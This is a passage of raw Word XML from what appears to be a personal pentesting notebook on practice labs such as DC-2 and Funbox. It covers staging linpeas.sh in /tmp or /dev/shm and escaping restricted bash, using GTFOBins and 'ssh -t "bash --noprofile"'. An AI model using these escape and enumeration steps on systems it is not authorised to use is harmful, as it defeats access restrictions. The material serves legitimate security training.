    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From within the target machine, run this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, you don't have write permissions inside a directory. A good place to try is /tmp since most users have write permissions there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003450">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or /dev/shm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the desired name you want</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003452">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linenum.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the name of the file you got locally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003453">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003454">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you need the file to be executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003455">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003456">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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58">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k1qvicbmloc6" w:id="469"/>
      <w:bookmarkEnd w:id="469"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rbash (restricted bash)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003459">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000345A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a </w:t>
      </w:r>
      <w:hyperlink r:id="rId1131">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId1132">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://0xffsec.com/handbook/shells/restricted-shells/</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45B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000345C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rbash is bash but in restricted mode. It still uses /bin/bash, but just in restricted mode. This was first introduced to me in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1133">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000345D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000345E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1134">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Peppo</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45F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003460">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check what commands you can run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003461">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003462">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First look at your PATH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003463">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo $PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003464">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="559"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should see something like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/&lt;user&gt;/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003465">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can tell you are in rbash when you aren't able to run a lot of commands. To see which commands you can run, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003466">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /home/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">michael</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003467">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="885"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">michael</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the username of the user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003468">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003469">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see "vi" after running this command above, then you can use vi to escape rbash (look at the subsection below). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If not, then you can try the SSH method if you have SSH access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pw4nahmigyer" w:id="470"/>
      <w:bookmarkEnd w:id="470"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaping restricted shell tips</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls /home/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;user&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you see all the binaries you have access to. Look up those binaries on GTFOBins, and look at the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">section of GTFOBins in order to use it to escape rbash and get a fully interactive shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000346F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003470">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This method was seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1135">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Peppo</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471">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003472">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003473">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bue5w2rlo7jq" w:id="471"/>
      <w:bookmarkEnd w:id="471"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaping restricted shell using SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003474">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003475">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh joe@funbox.fritz.box </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t "bash --noprofile"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003476">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Helps escape a restricted shell (like rbash) by starting a new instance of bash without loading profile files, which often include the restrictions or configurations that enforce the restricted environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003477">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the funbox PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003478">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003479">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then if you still see can't use commands, try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This adds common system binary directories (like sbin, bin) to your current shell's PATH variable. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
